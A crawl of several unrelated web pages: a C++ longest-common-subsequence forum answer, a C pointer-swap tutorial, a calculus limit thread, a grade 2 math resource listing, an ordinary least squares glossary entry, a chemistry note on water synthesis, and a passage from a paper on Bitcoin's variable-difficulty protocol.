{"ft_lang_label":"__label__en","ft_lang_prob":0.6513842,"math_prob":1.00001,"size":400,"snap":"2021-43-2021-49","text_gpt3_token_len":108,"char_repetition_ratio":0.11363637,"word_repetition_ratio":0.0,"special_character_ratio":0.2725,"punctuation_ratio":0.16091955,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":1.0000094,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-12-01T12:27:23Z\",\"WARC-Record-ID\":\"<urn:uuid:f2463b13-03d2-4b9c-b9e1-ffe1ba6babf4>\",\"Content-Length\":\"34364\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f1e56f65-b7d5-4078-8b32-59a0a3d6c85f>\",\"WARC-Concurrent-To\":\"<urn:uuid:1ca7cc81-b484-4545-a155-4a33f07e29fb>\",\"WARC-IP-Address\":\"216.239.32.21\",\"WARC-Target-URI\":\"https://socratic.org/questions/how-do-you-find-the-nth-partial-sum-determine-whether-the-series-converges-and-f-2\",\"WARC-Payload-Digest\":\"sha1:2VAZIENYFDADPGCKRXZVDUETER4CS4P6\",\"WARC-Block-Digest\":\"sha1:OYQYLM7SXQVKYWHDSCTHTCK2T3UZY3AE\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-49/CC-MAIN-2021-49_segments_1637964360803.0_warc_CC-MAIN-20211201113241-20211201143241-00413.warc.gz\"}"}
https://discuss.codechef.com/t/elements-of-lcs/10348
[ "", null, "# ELEMENTS OF LCS\n\nI have recently learnt how to find the length of the longest common subsequence of two strings, but cannot understand how can I print the elements of the LCS. For example, if the strings are “AASDGX” and “AAWD”, then the output will be “AAD” Please help!\n\n#include\n#include\n#include\nusing namespace std;\n\n``````/* Returns length of LCS for X[0..m-1], Y[0..n-1] */\nvoid lcs( char *X, char *Y, int m, int n )\n{\nint L[m+1][n+1];\n\n/* Following steps build L[m+1][n+1] in bottom up fashion. Note\nthat L[i][j] contains length of LCS of X[0..i-1] and Y[0..j-1] */\nfor (int i=0; i<=m; i++)\n{\nfor (int j=0; j<=n; j++)\n{\nif (i == 0 || j == 0)\nL[i][j] = 0;\nelse if (X[i-1] == Y[j-1])\nL[i][j] = L[i-1][j-1] + 1;\nelse\nL[i][j] = max(L[i-1][j], L[i][j-1]);\n}\n}\n\n// Following code is used to print LCS\nint index = L[m][n];\n\n// Create a character array to store the lcs string\nchar lcs[index+1];\nlcs[index] = '\\0'; // Set the terminating character\n\n// Start from the right-most-bottom-most corner and\n// one by one store characters in lcs[]\nint i = m, j = n;\nwhile (i > 0 && j > 0)\n{\n// If current character in X[] and Y are same, then\n// current character is part of LCS\nif (X[i-1] == Y[j-1])\n{\nlcs[index-1] = X[i-1]; // Put current character in result\ni--; j--; index--; // reduce values of i, j and index\n}\n\n// If not same, then find the larger of two and\n// go in the direction of larger value\nelse if (L[i-1][j] > L[i][j-1])\ni--;\nelse\nj--;\n}\n\n// Print the lcs\ncout << \"LCS of \" << X << \" and \" << Y << \" is \" << lcs;\n}\n\nint main()\n{\nchar X[] = \"AASDGX\";\nchar Y[] = \"AAWD\";\n\nint m = strlen(X);\nint n = strlen(Y);\n\nlcs(X, Y, m, n);\n\nreturn 0;\n}\n``````\n\n@anupam_datta welcome", null, "" ]
[ null, "https://s3.amazonaws.com/discourseproduction/original/3X/7/f/7ffd6e5e45912aba9f6a1a33447d6baae049de81.svg", null, "https://discuss.codechef.com/images/emoji/apple/slight_smile.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.74997973,"math_prob":0.99241066,"size":1699,"snap":"2020-34-2020-40","text_gpt3_token_len":593,"char_repetition_ratio":0.09852508,"word_repetition_ratio":0.0,"special_character_ratio":0.40317833,"punctuation_ratio":0.13681592,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9983371,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-09-23T03:07:22Z\",\"WARC-Record-ID\":\"<urn:uuid:e6102e41-28de-445d-bb67-92fca130c6d7>\",\"Content-Length\":\"21164\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d25fac83-0e0d-4f1a-8317-b8a8477120f4>\",\"WARC-Concurrent-To\":\"<urn:uuid:ae3d80d4-2ea8-4100-8834-d70fa1be9cf9>\",\"WARC-IP-Address\":\"52.54.40.124\",\"WARC-Target-URI\":\"https://discuss.codechef.com/t/elements-of-lcs/10348\",\"WARC-Payload-Digest\":\"sha1:XJQCJA3WVSZYD56OJPKKAMCJAKWAWBX4\",\"WARC-Block-Digest\":\"sha1:QVRD2AKFMMKJBF7ACSOVSKWYMOGK3G22\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-40/CC-MAIN-2020-40_segments_1600400209665.4_warc_CC-MAIN-20200923015227-20200923045227-00703.warc.gz\"}"}
https://www.nba-india.org/2023/04/01/c-program-to-swap-two-numbers-using-pointer/
[ "# C Program to Swap Two Numbers using Pointer\n\nIn this tutorial, i am going to show you how to swap two numbers with the help of pointer in c program.\n\n## C Program to Swap Two Numbers using Pointer\n\n```#include <stdio.h>\nvoid swapTwo(int *x, int *y)\n{\nint temp;\ntemp = *x;\n*x = *y;\n*y = temp;\n}\nint main()\n{\nint num1, num2;\nprintf(\"Please Enter the First Value to Swap = \");\nscanf(\"%d\", &num1);\nprintf(\"Please Enter the Second Value to Swap = \");\nscanf(\"%d\", &num2);\nprintf(\"\\nBefore Swapping: num1 = %d num2 = %d\\n\", num1, num2);\n\nswapTwo(&num1, &num2);\nprintf(\"After Swapping : num1 = %d num2 = %d\\n\", num1, num2);\n}```\n\nThe result of the above c program; is as follows:\n\n```Please Enter the First Value to Swap = 5\nPlease Enter the Second Value to Swap = 6\nBefore Swapping: num1 = 5 num2 = 6\nAfter Swapping : num1 = 6 num2 = 5```\n\nCategories C" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.61252415,"math_prob":0.99919695,"size":766,"snap":"2023-14-2023-23","text_gpt3_token_len":239,"char_repetition_ratio":0.13517061,"word_repetition_ratio":0.16783217,"special_character_ratio":0.3537859,"punctuation_ratio":0.18181819,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9871882,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-06-05T07:13:37Z\",\"WARC-Record-ID\":\"<urn:uuid:86881a4b-98e7-488f-b6e4-4981718ee0d2>\",\"Content-Length\":\"49374\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:31f98946-1058-45ff-a519-036a2108381a>\",\"WARC-Concurrent-To\":\"<urn:uuid:2d19698a-5dc3-4097-8447-1522fc05abef>\",\"WARC-IP-Address\":\"104.21.80.19\",\"WARC-Target-URI\":\"https://www.nba-india.org/2023/04/01/c-program-to-swap-two-numbers-using-pointer/\",\"WARC-Payload-Digest\":\"sha1:IXKT6GQXN4OFXRNQC6QPLCAVF7VZQZG4\",\"WARC-Block-Digest\":\"sha1:7GGKJTMM5HFTSO4B5CFKBN2VIR64R34D\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-23/CC-MAIN-2023-23_segments_1685224651325.38_warc_CC-MAIN-20230605053432-20230605083432-00484.warc.gz\"}"}
https://www.physicsforums.com/threads/nested-square-roots-limit.285577/
[ "# Nested square roots limit\n\n## Homework Statement", null, "## The Attempt at a Solution\n\nRelated Calculus and Beyond Homework Help News on Phys.org\nDick\nHomework Helper\n\nIt's more awkward to write than hard.\nsqrt(x+sqrt(x))=sqrt(x)*sqrt(1+1/sqrt(x)). Now pull a sqrt(x) out of the outer sqrt so you've got sqrt(x+sqrt(x+sqrt(x)))=sqrt(x)*(1+(1/sqrt(x))*sqrt(1+1/sqrt(x))). The denominator is sqrt(x)*sqrt(1+1/x). Now cancel the sqrt(x) on the outside and take the limit. If you can read that I congratulate you. I THINK I got it right.\n\nThe answer is 1... but how did you came up with the equivalent equation for the numerator? :(\n\nDefennder\nHomework Helper\n\nIt's probably advisable not to use L'hospital because of the nested square roots. Instead, follow what Dick said (I'm hoping I did it the same way he did because I didn't read his post in detail) and start by pulling out all the square roots by making sure that the denominator and numerator share the same square root over the entire expresion.\n\nThen apply that technique inside the nested root. It'll all simplify to something which you can evaluate the limit to.\n\nDick\nHomework Helper\n\nIt's probably advisable not to use L'hospital because of the nested square roots. Instead, follow what Dick said (I'm hoping I did it the same way he did because I didn't read his post in detail) and start by pulling out all the square roots by making sure that the denominator and numerator share the same square root over the entire expresion.\n\nThen apply that technique inside the nested root. It'll all simplify to something which you can evaluate the limit to.\nRight. l'Hopital gets messy. But you can write both numerator and denominator as sqrt(x) times something that goes to 1 as x->infinity. Just factor them both as sqrt(x)*something.\n\nl'Hopital gets messy indeed. But, hey, at least it's honest. :tongue2:\n\nDick" ]
[ null, "data:image/svg+xml;charset=utf-8,%3Csvg xmlns%3D'http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg' width='226' height='114' viewBox%3D'0 0 226 114'%2F%3E", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9499366,"math_prob":0.9220074,"size":897,"snap":"2020-34-2020-40","text_gpt3_token_len":210,"char_repetition_ratio":0.09854423,"word_repetition_ratio":0.0,"special_character_ratio":0.22408026,"punctuation_ratio":0.108571425,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9931256,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-08-15T05:36:21Z\",\"WARC-Record-ID\":\"<urn:uuid:624f4d77-9534-4272-97d3-6a68bac6d3df>\",\"Content-Length\":\"86557\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:3d914051-5f8c-4f96-922c-d67733b65612>\",\"WARC-Concurrent-To\":\"<urn:uuid:cb923b88-099a-4411-86ad-7bf28dacf7d2>\",\"WARC-IP-Address\":\"23.111.143.85\",\"WARC-Target-URI\":\"https://www.physicsforums.com/threads/nested-square-roots-limit.285577/\",\"WARC-Payload-Digest\":\"sha1:B3RT7ZQIFROEB4BWG347PFQDG3M7VONG\",\"WARC-Block-Digest\":\"sha1:QZNXJBER654IPK5AKRT2OOUJWFTPEIEH\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-34/CC-MAIN-2020-34_segments_1596439740679.96_warc_CC-MAIN-20200815035250-20200815065250-00536.warc.gz\"}"}
https://www.teachstarter.com/us/teaching-resource/math-warm-ups-interactive-powerpoint-grade-2/
[ "# Math Warm-Ups Interactive PowerPoint - Grade 2\n\n0\n3\nPDF, PowerPoint | 23 pages|Grade: 2\n\nA PowerPoint providing a series of warm-up activities for Grade 2 students across the mathematics curriculum.\n\nThis teaching resource is an interactive PowerPoint which provides a series of mathematical warm-up activities that cover areas across the curriculum. You can do these quick activities to help warm up for a particular focus lesson, or use them to break up the day to keep students fresh for learning. Some activities supply instructions for interactive games and other are interactive templates which you can display on your classroom whiteboard with a projector.\n\nSpecific topics include:\n\n#### Common Core Curriculum alignment\n\n• CCSS.MATH.CONTENT.2.G.A.2\n\nPartition a rectangle into rows and columns of same-size squares and count to find the total number of them.\n\n• CCSS.MATH.CONTENT.2.G.A.3\n\nPartition circles and rectangles into two, three, or four equal shares, describe the shares using the words halves, thirds, half of, a third of, etc., and describe the whole as two halves, three thirds, four fourths. Recognize that equal shares of id...\n\n• CCSS.MATH.CONTENT.2.MD.A.1\n\nMeasure the length of an object by selecting and using appropriate tools such as rulers, yardsticks, meter sticks, and measuring tapes.\n\n• CCSS.MATH.CONTENT.2.MD.A.2\n\nMeasure the length of an object twice, using length units of different lengths for the two measurements; describe how the two measurements relate to the size of the unit chosen.\n\n• CCSS.MATH.CONTENT.2.MD.B.6\n\nRepresent whole numbers as lengths from 0 on a number line diagram with equally spaced points corresponding to the numbers 0, 1, 2, ..., and represent whole-number sums and differences within 100 on a number line diagram.\n\n• CCSS.MATH.CONTENT.2.MD.C.7\n\nTell and write time from analog and digital clocks to the nearest five minutes, using a.m. and p.m.\n\n• CCSS.MATH.CONTENT.2.MD.C.8\n\nSolve word problems involving dollar bills, quarters, dimes, nickels, and pennies, using \\$ and ¢ symbols appropriately. Example: If you have 2 dimes and 3 pennies, how many cents do you have?\n\n• CCSS.MATH.CONTENT.2.MD.D.10\n\nDraw a picture graph and a bar graph (with single-unit scale) to represent a data set with up to four categories. Solve simple put-together, take-apart, and compare problems1 using information presented in a bar graph.\n\n• CCSS.MATH.CONTENT.2.NBT.A.1\n\nUnderstand that the three digits of a three-digit number represent amounts of hundreds, tens, and ones; e.g., 706 equals 7 hundreds, 0 tens, and 6 ones. Understand the following as special cases:\n\n• CCSS.MATH.CONTENT.2.NBT.A.2\n\nCount within 1000; skip-count by 5s, 10s, and 100s.\n\n• CCSS.MATH.CONTENT.2.NBT.B.5\n\nFluently add and subtract within 100 using strategies based on place value, properties of operations, and/or the relationship between addition and subtraction.\n\n• CCSS.MATH.CONTENT.2.NBT.B.6\n\nAdd up to four two-digit numbers using strategies based on place value and properties of operations.\n\n• CCSS.MATH.CONTENT.2.OA.C.3\n\nDetermine whether a group of objects (up to 20) has an odd or even number of members, e.g., by pairing objects or counting them by 2s; write an equation to express an even number as a sum of two equal addends.\n\n• CCSS.MATH.CONTENT.2.OA.C.4\n\nUse addition to find the total number of objects arranged in rectangular arrays with up to 5 rows and up to 5 columns; write an equation to express the total as a sum of equal addends.", null, "Write a review to help other teachers and parents like yourself. If you would like to request a change (Changes & Updates) to this resource, or report an error, simply select the corresponding tab above.\n\n#### Suggest a change\n\nWould you like something changed or customized on this resource? While our team evaluates every suggestion, we can't guarantee that every change will be completed.\n\nYou must be logged in to request a change. Sign up now!\n\n#### Report an Error\n\nYou must be logged in to report an error. Sign up now!\n\nIf any of our resources do not have 100% accurate American English (en-US), simply click on the 'Report an error' tab above to let us know. We will have the resource updated and ready for you to download in less than 24 hours. Read more..." ]
[ null, "https://www.teachstarter.com/wp-content/uploads/2020/01/TS_logo_3000px-150x150.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.85905766,"math_prob":0.89759445,"size":4814,"snap":"2021-31-2021-39","text_gpt3_token_len":1095,"char_repetition_ratio":0.121829525,"word_repetition_ratio":0.022824537,"special_character_ratio":0.20814292,"punctuation_ratio":0.18969072,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9801417,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-07-23T21:56:27Z\",\"WARC-Record-ID\":\"<urn:uuid:9ce998ed-02da-4dc1-b2d0-9af64f6e196a>\",\"Content-Length\":\"242109\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:97b718e2-a01a-4ec1-a70d-5bfe6c95a191>\",\"WARC-Concurrent-To\":\"<urn:uuid:f7cb34a9-fd1c-40a1-a00a-f49bb3b4aa7b>\",\"WARC-IP-Address\":\"104.22.26.76\",\"WARC-Target-URI\":\"https://www.teachstarter.com/us/teaching-resource/math-warm-ups-interactive-powerpoint-grade-2/\",\"WARC-Payload-Digest\":\"sha1:GJ4PXD5VU4FLI44OPSFIUY3DQ3GFVXMB\",\"WARC-Block-Digest\":\"sha1:PYIWV57LYLOVPSLVDT77LYKF6A3GV6N6\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046150067.51_warc_CC-MAIN-20210723210216-20210724000216-00027.warc.gz\"}"}
https://deepai.org/machine-learning-glossary-and-terms/ordinary-least-squares
[ "", null, "", null, "# Ordinary Least Squares\n\n## What is Ordinary Least Squares?\n\nOrdinary Least Squares is a form of statistical regression used as a way to predict unknown values from an existing set of data. An example of a scenario in which one may use Ordinary Least Squares, or OLS, is in predicting shoe size from a data set that includes height and shoe size. Given the data, one can use the ordinary least squares formula to create a rate of change and predict shoe size, given a subject's height. In short, OLS takes an input, the independent variable, and produces an output, the dependent variable.\n\n## How does Ordinary Least Squares work?\n\nOrdinary Least Squares works by taking the input, an independent variable, and combines it with other variables known as betas through addition and multiplication. The first beta is known simply as \"beta_1\" and is used to calculate the slope of the function. In essence, it tells you what the output would be if the input was zero. The second beta is called \"beta_2\" and represents the coefficient, or how much of a difference there is between increments in the independent variable.\n\nSource\n\nTo find the betas, OLS uses the errors, the vertical distance between a data point and a regression line, to calculate the best slope for the data. The image above exemplifies the concept of determining the squares of the errors to find the regression line. OLS squares the errors and finds the line that goes through the sample data to find the smallest value for the sum of all of the squared errors.\n\n### Ordinary Least Squares and Machine Learning\n\nAs ordinary least squares is a form of regression, used to inform predictions about sample data, it is widely used in machine learning. Using the example mentioned above, a machine learning algorithm can process and analyze specific sample data that includes information on both height and shoe size. Given the the data points, and using ordinary least squares, the algorithm can begin to make predictions about an individual's shoe size given their height and given the sample data." ]
[ null, "https://deepai.org/static/images/logo.png", null, "https://deepai.org/static/images/glossary-icon.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9110437,"math_prob":0.99210703,"size":2013,"snap":"2020-45-2020-50","text_gpt3_token_len":406,"char_repetition_ratio":0.13439523,"word_repetition_ratio":0.01179941,"special_character_ratio":0.19274715,"punctuation_ratio":0.094986804,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99858737,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-27T00:34:19Z\",\"WARC-Record-ID\":\"<urn:uuid:bb10dec2-d02e-4bd2-946a-67e346920969>\",\"Content-Length\":\"94243\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:403a7be9-24e8-4560-87bc-cdae77004361>\",\"WARC-Concurrent-To\":\"<urn:uuid:fb368fa1-4013-4fcc-b9cf-9d1bb57bc98f>\",\"WARC-IP-Address\":\"52.26.36.19\",\"WARC-Target-URI\":\"https://deepai.org/machine-learning-glossary-and-terms/ordinary-least-squares\",\"WARC-Payload-Digest\":\"sha1:GPAYTKAFFDWVQXTJQFLHFMJLYDEVIHFJ\",\"WARC-Block-Digest\":\"sha1:VMMSIN2OAT3I5DMWTZELKX2SA7PIWSX3\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107892710.59_warc_CC-MAIN-20201026234045-20201027024045-00496.warc.gz\"}"}
https://chestofbooks.com/crafts/metal/Applied-Science-Metal-Workers/135-Synthesis.html
[ "As already stated, when the proper proportions by weight of oxygen and hydrogen are mixed and a spark passed through, water is formed. This change, often called a reaction, may be written as follows:\n\n 2H + O = H1O 2 atoms of hydrogen combined with 1 atom of oxygen forms 1 molecule of water\n\nAbbreviating a reaction in this manner is called writing a chemical equation. In a very concise form it shows: on the left-hand side of the equation the substances (called factors) which enter the reaction, on the right-hand side the products, and also the exact amount of each that must be taken or formed. Once the products are determined (usually by experiments), the equation may be written and balanced by having the same number of atoms of the elements on each side of the equation. Forming compounds by combining elements is called synthesis." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.95175576,"math_prob":0.98695385,"size":1006,"snap":"2019-35-2019-39","text_gpt3_token_len":214,"char_repetition_ratio":0.10878243,"word_repetition_ratio":0.0,"special_character_ratio":0.20576541,"punctuation_ratio":0.104166664,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95560867,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-08-23T19:43:23Z\",\"WARC-Record-ID\":\"<urn:uuid:42e55e58-854b-4f7b-ba98-952d77207acc>\",\"Content-Length\":\"16517\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:611db64f-f458-4ee8-b41a-c9675c53f007>\",\"WARC-Concurrent-To\":\"<urn:uuid:66326753-ee04-4b51-ba8b-d485feb70afe>\",\"WARC-IP-Address\":\"208.70.246.108\",\"WARC-Target-URI\":\"https://chestofbooks.com/crafts/metal/Applied-Science-Metal-Workers/135-Synthesis.html\",\"WARC-Payload-Digest\":\"sha1:ZFJYH4JMWZGHKRQ6HDOCSHUPRXKBOUEA\",\"WARC-Block-Digest\":\"sha1:SEARHV35B6E3E7R5ZLTUY56JOPNJZCPG\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-35/CC-MAIN-2019-35_segments_1566027318986.84_warc_CC-MAIN-20190823192831-20190823214831-00178.warc.gz\"}"}
https://link.springer.com/chapter/10.1007/978-3-319-63688-7_10
[ "# The Bitcoin Backbone Protocol with Chains of Variable Difficulty\n\nConference paper\nPart of the Lecture Notes in Computer Science book series (LNCS, volume 10401)\n\n## Abstract\n\nBitcoin’s innovative and distributedly maintained blockchain data structure hinges on the adequate degree of difficulty of so-called “proofs of work,” which miners have to produce in order for transactions to be inserted. Importantly, these proofs of work have to be hard enough so that miners have an opportunity to unify their views in the presence of an adversary who interferes but has bounded computational power, but easy enough to be solvable regularly and enable the miners to make progress. As such, as the miners’ population evolves over time, so should the difficulty of these proofs. Bitcoin provides this adjustment mechanism, with empirical evidence of a constant block generation rate against such population changes.\n\nIn this paper we provide the first formal analysis of Bitcoin’s target (re)calculation function in the cryptographic setting, i.e., against all possible adversaries aiming to subvert the protocol’s properties. We extend the q-bounded synchronous model of the Bitcoin backbone protocol [Eurocrypt 2015], which posed the basic properties of Bitcoin’s underlying blockchain data structure and shows how a robust public transaction ledger can be built on top of them, to environments that may introduce or suspend parties in each round.\n\nWe provide a set of necessary conditions with respect to the way the population evolves under which the “Bitcoin backbone with chains of variable difficulty” provides a robust transaction ledger in the presence of an actively malicious adversary controlling a fraction of the miners strictly below $$50\\%$$ at each instant of the execution. Our work introduces new analysis techniques and tools to the area of blockchain systems that may prove useful in analyzing other blockchain protocols.\n\n## 1 Introduction\n\nThe Bitcoin backbone  extracts and analyzes the basic properties of Bitcoin’s underlying blockchain data structure, such as “common prefix” and “chain quality,” which parties (“miners”) maintain and try to extend by generating “proofs of work” (POW, aka “cryptographic puzzles” [1, 8, 14, 23])1. It is then formally shown in  how fundamental applications including consensus [17, 22] and a robust public transaction ledger realizing a decentralized cryptocurrency (e.g., Bitcoin ) can be built on top of them, assuming that the hashing power of an adversary controlling a fraction of the parties is strictly less than 1/2.\n\nThe results in , however, hold for a static setting, where the protocol is executed by a fixed number of parties (albeit not necessarily known to the participants), and therefore with POWs (and hence blockchains) of fixed difficulty. This is in contrast to the actual deployment of the Bitcoin protocol where a “target (re)calculation” mechanism adjusts the hardness level of POWs as the number of parties varies during the protocol execution. In more detail, in  the target T that the hash function output must not exceed, is set and hardcoded at the beginning of the protocol, and in such a way that a specific relation to the number of parties running the protocol is satisfied, namely, that a ratio f roughly equal to $$q n T/2^{\\kappa }$$ is small, where q is the number of queries to the hash function that each party is allowed per round, n is the number of parties, and $$\\kappa$$ is the length of the hash function output. Security was only proven when the number of parties is n and the choice of target T is never recalculated, thus leaving as open question the full analysis of the protocol in a setting where, as in the real world, parties change dynamically over time.\n\nIn this paper, we abstract for the first time the target recalculation algorithm from the Bitcoin system, and present a generalization and analysis of the Bitcoin backbone protocol with chains of variable difficulty, as produced by an evolving population of parties, thus answering the aforementioned open question.\n\nIn this setting, there is a parameter m which determines the length of an “epoch” in number of blocks.2 When a party prepares to compute the j-th block of a chain with $$j \\bmod m = 1$$, it uses a target calculation algorithm that determines the proper target value to use, based on the party’s local view about the total number of parties that are present in the system, as reflected by the rate of blocks that have been created so far and are part of the party’s chain. (Each block contains a timestamp of when it was created; in our synchronous setting, timestamps will correspond to the round numbers when blocks are created—see Sect. 2.) To accomodate the evolving population of parties, we extend the model of  to environments that are free to introduce and suspend parties in each round. In other respects, we follow the model of , where all parties have the same “hashing power,” with each one allowed to pose q queries to the hash function that is modeled as a “random oracle” . We refer to our setting as the dynamic q -bounded synchronous setting.\n\nIn order to give an idea of the issues involved, we note that without a target calculation mechanism, in the dynamic setting the backbone protocol is not secure even if all parties are honest and follow the protocol faithfully. Indeed, it is easy to see that a combination of an environment that increases the number of parties and adversarial network conditions can lead to substantial divergence (a.k.a. “forks”) in the chains of the honest parties, leading to the violation of the agreement-type properties that are needed for the applications of the protocol, such as maintaining a robust transaction ledger. The attack is simple: the environment increases the number of parties constantly so that the block production rate per round increases (which is roughly the parameter f mentioned above); then, adversarial network conditions may divide the parties into two sets, A and B, and schedule message delivery so that parties in set A receive blocks produced by parties in A first, and similarly for set B. According to the Bitcoin protocol, parties adopt the block they see first, and thus the two sets will maintain two separate blockchains.\n\nWhile this specific attack could in principle be thwarted by modifying the Bitcoin backbone (e.g., by randomizing which block a party adopts when they receive in the same round two blocks of the same index in the chain), it certainly would not cope with all possible attacks in the presence of a full-blown adversary and target recalculation mechanism. Indeed, such an attack was shown in , where by mining “privately” with timestamps in rapid succession, corrupt miners are able to induce artificially high targets in their private chain; even though such chain may grow slower than the main chain, it will still make progress and, via an anti-concentration argument, a sudden adversarial advance that can break agreement amongst honest parties cannot be ruled out.\n\nGiven the above, our main goal is to show that the backbone protocol with a Bitcoin-like target recalculation function satisfies the common prefix and chain quality properties, as an intermediate step towards proving that the protocol implements a robust transaction ledger. Expectedly, the class of protocols we will analyze will not preserve its properties for arbitrary ways in which the number of parties may change over time. In order to bound the error in the calibration of the block generation rate that the target recalculation function attempts, we will need some bounds on the way the number of parties may vary. For $$\\gamma \\in \\mathbb {R}^+$$ and $$s\\in \\mathbb {N}$$, we will call a sequence $$(n_r)_{r \\in \\mathbb {N}}$$ of parties $$(\\gamma ,s)$$ -respecting if it holds that in a sequence of rounds S with $$|S|\\le s$$, $$\\max _{r\\in S} n_r \\le \\gamma \\cdot \\min _{r\\in S} n_r$$, and will determine for what values of these parameters the backbone protocol is secure.\n\nAfter formally describing blockchains of variable difficulty and the Bitcoin backbone protocol in this setting, at a high level our analysis goes as follows. We first introduce the notion of goodness regarding the approximation that is performed on f in an epoch. In more detail, we call a round r $$(\\eta ,\\theta )$$ -good, for some parameters $$\\eta ,\\theta \\in \\mathbb {R}^+$$, if the value $$f_r$$ computed for the actual number of parties and target used in round r by some honest party, falls in the range $$[\\eta f, \\theta f]$$, where f is the initial block production rate (note that the first round is always assumed good). Together with “goodness” we introduce the notion of typical executions, in which, informally, for any set S of consecutive rounds the successes of the adversary and the honest parties do not deviate too much from their expectations as well as no “bad” event concerning the hash function occurs (such as a collision). Using a martingale bound we demonstrate that almost all polynomially bounded (in $$\\kappa$$) executions are typical.\n\nNext, we proceed to show that in a typical execution any chain that an honest party adopts (1) contains timestamps that are approximately accurate (i.e., no adversarial block has a timestamp that differs too much from its real creation time), and (2) it has a target such that the probability of block production remains near the fixed constant f, i.e., it is “good.” Finally, these properties allow us to demonstrate that a typical execution enjoys the common prefix and chain quality properties, which is a stepping stone towards the ultimate goal, that of establishing that the backbone protocol with variable difficulty implements a robust transaction ledger. Specifically, we show the following:\n\nMain Result. (Informal—see Theorems 4 and 5). The Bitcoin backbone protocol with chains of variable difficulty, suitably parameterized, satisfies with overwhelming probability in m and $$\\kappa$$ the properties of (1) persistence—if a transaction $$tx$$ is confirmed by an honest party, no honest party will ever disagree about the position of $$tx$$ in the ledger, and (2) liveness—if a transaction $$tx$$ is broadcast, it will eventually become confirmed by all honest parties.\n\nRemark. Regarding the actual parameterization of the Bitcoin system (that uses epochs of $$m=2016$$ blocks), even though it is consistent with all the constraints of our theorems (cf. Remark 3 in Sect. 6.1), it cannot be justified by our martingale analysis. In fact, our probabilistic analysis would require much longer epochs to provide a sufficiently small probability of attack. Tightening the analysis or discovering attacks for parameterizations beyond our security theorems is an interesting open question.\n\nFinally, we note that various extensions to our model are relevant to the Bitcoin system and constitute interesting directions for further research. Importantly, a security analysis in the “rational” setting (see, e.g., [9, 15, 24]), and in the “partially synchronous,” or “bounded-delay” network model [7, 21]3.\n\n## 2 Model and Definitions\n\nWe describe our protocols in a model that extends the synchronous communication network model presented in [10, 11] for the analysis of the Bitcoin backbone protocol in the static setting with a fixed number of parties (which in turn is based on Canetti’s formulation of “real world” notion of protocol execution [4, 5, 6] for multi-party protocols) to the dynamic setting with a varying number of parties. In this section we provide a high-level overview of the model, highlighting the differences that are intrinsic to our dynamic setting.\n\nRound Structure and Protocol Execution. As in , the protocol execution proceeds in rounds with inputs provided by an environment program denoted by $$\\mathcal {Z}$$ to parties that execute the protocol $$\\varPi$$, and our adversarial model in the network is “adaptive,” meaning that the adversary $$\\mathcal {A}$$ is allowed to take control of parties on the fly, and “rushing,” meaning that in any given round the adversary gets to see all honest players’ messages before deciding his strategy. The parties’ access to the hash function and their communication mechanism are captured by a joint random oracle/diffusion functionality which reflects Bitcoin’s peer structure. The diffusion functionality, , allows the order of messages to be controlled by $$\\mathcal {A}$$, i.e., there is no atomicity guarantees in message broadcast , and, furthermore, the adversary is allowed to spoof the source information on every message (i.e., communication is not authenticated). Still, the adversary cannot change the contents of the messages nor prevent them from being delivered. We will use Diffuse as the message transmission 